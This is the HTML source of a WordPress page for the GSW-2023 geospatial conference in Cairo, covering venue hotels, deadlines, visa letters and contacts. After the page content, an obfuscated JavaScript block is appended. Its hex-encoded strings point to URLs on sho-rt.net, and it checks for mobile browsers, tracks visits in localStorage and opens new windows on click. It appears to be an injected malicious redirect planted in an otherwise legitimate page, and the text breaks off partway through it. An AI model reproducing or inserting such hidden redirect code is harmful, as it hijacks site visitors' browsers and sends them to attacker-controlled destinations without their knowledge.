class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : gsw2023@funtrip-travel.com</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const 